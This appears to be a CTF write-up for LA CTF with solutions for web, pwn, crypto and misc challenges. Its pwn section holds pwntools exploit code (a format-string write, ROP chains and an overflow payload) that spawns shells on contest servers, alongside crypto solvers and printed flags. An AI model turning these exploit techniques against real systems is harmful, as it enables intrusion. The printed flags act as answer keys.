Metaenter the metaverse and metapost about metathings. All you have to metado is metaregister for a metaaccount and you’re good to metago. https://metaverse.lac.tf/ You can metause our fancy new metaadmin metabot to get the admin to metaview your metapost!
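Solution approach
g0at: It looks like someone (zhanyi✌) had already broken it wide open, so I just picked up the leftovers: logging in with username and password 123 got me straight in.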
college-tour
Challenge description
Welcome to UCLA! To explore the #1 public college, we have prepared a scavenger hunt for you to walk all around the beautiful campus.
Solution approach
Just look around everywhere for the flag. lactf{j03_4nd_j0S3phIn3_bRU1n_sAY_hi}
Pwn
rut-roh-relro
Challenge description
My friend keeps writing super insecure C programs but I’m too lazy to fix his code. I’m sure it’ll be fine as long as I use enough exploit mitigations, right? nc lac.tf 31134
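```python
# Fragment: ret_stack, pop_rdi_ret, bin_sh and system_addr are defined in
# parts of the script that are not shown on the page.
g = fmtstr_payload(6, {ret_stack: pop_rdi_ret, ret_stack + 8: bin_sh, ret_stack + 0x10: system_addr}, write_size='byte')
p.sendlineafter("What would you like to post?", g)
p.interactive()
```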
redact
Challenge description
I heard C was insecure so I wrote my flag redactor program in C++. nc lac.tf 31281 Note: There are multiple optimized implementations of memmove and one is selected at runtime based on available CPU features, meaning that any solution that uses the memmove GOT entry could fail on remote. The challenge is solvable without memmove.
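```python
# Fragment: the gadget addresses, start_addr, bin_sh and system_addr are
# defined in parts of the script that are not shown on the page.
# dbg(src)
g = 'a'
p.sendlineafter("Enter some text: ", g)

# First pass through the program
g = b'b'*0x48 + p64(pop_rdi_ret) + p64(0x4040C0) + p64(pop_rsi_r15_ret) + p64(0x403FE8) + p64(0) + p64(0x4010C0) + p64(start_addr)
p.sendlineafter("Enter a placeholder: ", g)

index = 0
p.sendlineafter("Enter the index of the stuff to redact: ", str(index))

# Second pass through the program
g = b'b'*0x48 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)
p.sendlineafter("Enter a placeholder: ", g)
index = 0
p.sendlineafter("Enter the index of the stuff to redact: ", str(index))

p.interactive()
```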
gatekeep
Challenge description
If I gaslight you enough, you won’t be able to get my flag! :) nc lac.tf 31121 Note: The attached binary is the exact same as the one executing on the remote server.
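Solution approach
g0at: An obvious warm-up challenge at first glance.
The main function calls check(); let's follow it.
The logic is simple: it asks you to guess the password, and a correct password leads to print_flag(). However, gets() here is an obvious overflow. We can see char s1[15], so we only need to enter a sufficiently large number to bypass check() directly and cat the flag.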
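The overflow described above, next to a bounded version, as an added example that is not part of the original writeup or the challenge source. The struct layout, the `allowed` variable, the password value and the function names are assumptions made for illustration; only `gets()`, `check()` and `char s1[15]` come from the page.

```c
#include <stdio.h>
#include <string.h>

/* Constructed password; the real challenge value is not on the page. */
static const char PASSWORD[] = "hunter2";

/* Assumed layout (not taken from the binary): the 15-byte buffer from the
 * writeup sits directly below the variable that gates print_flag(). */
struct frame {
    char s1[15];
    int allowed;                 /* non-zero means print_flag() would run */
};

/* Models gets(): the copy length comes from the input, not from sizeof s1.
 * It is clamped to the struct only so that this demo stays well defined. */
static int check_unbounded(const char *line) {
    struct frame f;
    memset(&f, 0, sizeof f);
    size_t n = strlen(line);
    if (n > sizeof f) n = sizeof f;
    memcpy(&f, line, n);         /* bytes past s1 land in allowed */
    if (strncmp(f.s1, PASSWORD, sizeof f.s1) == 0) f.allowed = 1;
    return f.allowed != 0;
}

/* Hardened: the copy is bounded by the buffer, as fgets(s1, sizeof s1, stdin)
 * would do, so an over-long line is truncated instead of spilling over. */
static int check_bounded(const char *line) {
    struct frame f;
    memset(&f, 0, sizeof f);
    snprintf(f.s1, sizeof f.s1, "%s", line);
    if (strcmp(f.s1, PASSWORD) == 0) f.allowed = 1;
    return f.allowed != 0;
}

int main(void) {
    const char *inputs[] = { "hunter2", "wrong", "AAAAAAAAAAAAAAAAAAAAAAAA" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-26s gets-style=%d bounded=%d\n", inputs[i],
               check_unbounded(inputs[i]), check_bounded(inputs[i]));
    return 0;
}
```

With the gets-style copy the over-long input is accepted even though it never matches the password; with the bounded copy only the correct password passes.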
bot
Challenge description
I made a bot to automatically answer all of your questions. nc lac.tf 31180
Solution steps
```python
#!/usr/bin/env python3
from pwn import *

p = remote("lac.tf", 31180)
p.recv()
g = b"may i have the flag?\0"
g += b"A"*(64-len(g))   # pad the input to 64 bytes
g += b'BBBBBBBB'        # 8 more filler bytes
g += p64(0x40129a)      # 8-byte address placed after the filler
p.sendline(g)
p.interactive()
```
I heard the onetime pad is perfectly secure so I used it to send an important message to a friend, but now a UCLA competition is asking for the key? I threw that out a long time ago! Can you help me recover it?
```python
from itertools import cycle
pt = b"Long ago, the four nations lived together in harmony ..."

key = cycle(b"lactf{??????????????}")

ct = ""

for i in range(len(pt)):
    b = (pt[i] ^ next(key))
    ct += f'{b:02x}'
print("ct =", ct)
```
```python
from Crypto.Util.number import *
pt = b"Long ago, the four nations lived together in harmony ..."
ct = 0x200e0d13461a055b4e592b0054543902462d1000042b045f1c407f18581b56194c150c13030f0a5110593606111c3e1f5e305e174571431e
ct = long_to_bytes(int(ct))

for i in range(len(ct)):
    flag = (pt[i] ^ ct[i])
    print(chr(flag), end='')
#lactf{b4by_h1t_m3_0ne_m0r3_t1m3}
```
chinese-lazy-theorem-1
Challenge description
I heard about this cool theorem called the Chinese Remainder Theorem, but, uh… I’m feeling kinda tired right now. nc lac.tf 31110
```python
from Crypto.Util.number import getPrime
from Crypto.Random.random import randint

p = getPrime(512)
q = getPrime(512)
n = p*q

target = randint(1, n)

used_oracle = False

print(p)
print(q)

print("To quote Pete Bancini, \"I'm tired.\"")
print("I'll answer one modulus question, that's it.")
while True:
    print("What do you want?")
    print("1: Ask for a modulus")
    print("2: Guess my number")
    print("3: Exit")
    response = input(">> ")

    if response == "1":
        if used_oracle:
            print("too lazy")
            print()
        else:
            modulus = input("Type your modulus here: ")
            modulus = int(modulus)
            if modulus <= 0:
                print("something positive pls")
                print()
            else:
                used_oracle = True
                print(target%modulus)
                print()
    elif response == "2":
        guess = input("Type your guess here: ")
        if int(guess) == target:
            with open("flag.txt", "r") as f:
                print(f.readline())
        else:
            print("nope")
        exit()
    else:
        print("bye")
        exit()
```
Solution approach
In print(target%modulus), choosing a modulus greater than target leaks target directly.
rolling in the mud
Challenge description
uugh, these pigs in my pen are making a complete mess! They’re rolling all over the place! Anyway, can you decode this cipher they gave me, almost throwing it at me while rolling around? Answer in lowercase with symbols. In the image, { and } are characters that should appear in your flag, and replace spaces with _.
You think you’ve seen all of the “classic” ciphers? Instead of your standard cipher, I’ve created my own cipher: the monoalphagreek cipher! Answer with just the flag in lowercase with symbols left in.
I’m trying out for this new game show, but it doesn’t seem that hard since there are only two choices? Regardless, I heard someone named Pollard could help me out with it?
```python
import random
from Crypto.Util.number import getPrime

n = 43799663339063312211273714468571591746940179019655418145595314556164983756585900662541462573429625012257141409310387298658375836921310691578072985664621716240663221443527506757539532339372290041884633435626429390371850645743643273836882575180662344402698999778971350763364891217650903860191529913028504029597794358613653479290767790778510701279503128925407744958108039428298936189375732992781717888915493080336718221632665984609704015735266455668556495869437668868103607888809570667555794011994982530936046877122373871458757189204379101886886020141036227219889443327932080080504040633414853351599120601270071913534530651
a = 6

print("n = ", n)
print("a = ", 6)

for i in range(150):
    bit = random.randrange(0,2)
    c = random.randrange(0, n)
    c = c**2
    if bit == 1:
        c *= a
    print("c = ", c)
    guess = int(input("What is your guess? "))
    if guess != bit:
        print("Better luck next time!")
        exit()

print("Congrats! Here's your flag: ")
flag = open("flag.txt", "r").readline().strip()
print(flag)
exit(0)
```
```python
from pwn import *
from sympy.ntheory.primetest import is_square

p = remote('lac.tf', 31190)
p.recvline()
p.recvline()

C = 0

while C != 150:
    c = int((p.recvline().decode()).split(" ")[-1])
    # c is never reduced mod n, so a plain integer square test on c//6
    # tells the two cases apart.
    if c%6 == 0 and is_square(c//6):
        p.sendline(b"1")
    else:
        p.sendline(b"0")
    C += 1
    print(C,end="\r")
print(p.recv(1024))
print(p.recv(1024))
```
```python
from Crypto.Util.number import getPrime
from Crypto.Random.random import randint

p = getPrime(512)
q = getPrime(512)
n = p*q*2*3*5

target = randint(1, n)

oracle_uses = 0

print(p)
print(q)

print("This time I'll answer 2 modulus questions and give you 30 guesses.")
while True:
    print("What do you want?")
    print("1: Ask for a modulus")
    print("2: Guess my number")
    print("3: Exit")
    response = input(">> ")
```
```python
from pwn import *
from sympy.ntheory.modular import crt

with remote("lac.tf", 31111) as r:
    p = int(r.readline(False))
    q = int(r.readline(False))
    # Oracle query 1: target mod p
    r.sendline(b"1")
    r.readuntil(b"Type your modulus here: ")
    r.sendline(str(p).encode())
    x = int(r.readline(False))
    # Oracle query 2: target mod q
    r.sendline(b"1")
    r.readuntil(b"Type your modulus here: ")
    r.sendline(str(q).encode())
    y = int(r.readline(False))
    # a = target mod p*q, b = p*q; since n = 30*p*q, target is one of
    # a + i*b for i in range(30), which fits in the 30 allowed guesses.
    a, b = crt([p,q],[x,y])
    r.sendline(b"2")
    for i in range(30):
        r.readuntil(b"Type your guess here: ")
        r.sendline(str(a+i*b).encode())
        print(r.readline())
```
Misc
CATS!
Challenge description
CATS OMG I CAN’T BELIEVE HOW MANY CATS ARE IN THIS IMAGE I NEED TO VISIT CAN YOU FIGURE OUT THE NAME OF THIS CAT HEAVEN? Answer is the domain of the website for this location. For example, if the answer was ucla, the flag would be lactf{ucla.edu}.
Where was this photo taken? I think it used to be in the original photo, but someone cropped it out! The flag is lactf{location}, where location is the name of the POI that this person hiked up to, all lowercase and replacing spaces with underscores. Use the google maps name of the POI: for example, if the solution is the UCLA Bruin Bear statue, this is the google maps location, and the flag would be lactf{bruin_statue}. Please note: contacting anyone or any organization beyond official LA CTF support channels regarding this challenge is against the rules. Please be respectful of those who are involved in this challenge.
I found this google sheets link on the internet. I’m sure it’s hiding something, but I can’t find anything? Can you find the flag? Choose any link (they’re all the same): Link 1, Link 2, Link 3
I was trying to send a flag to my friend over UDP, one character at a time, but it got corrupted! I think someone else was messing around with me and sent extra bytes, though it seems like they actually abided by RFC 3514 for once. Can you get the flag?
My friend sent me this message link that apparently links to a “flag”, but discord says “You don’t have access to this link”! They did mention something about them being able to embed a list of online users on their own website, and sent me this image. Can you figure out how to join the server? Note: Discord phone verification is NOT required for this challenge.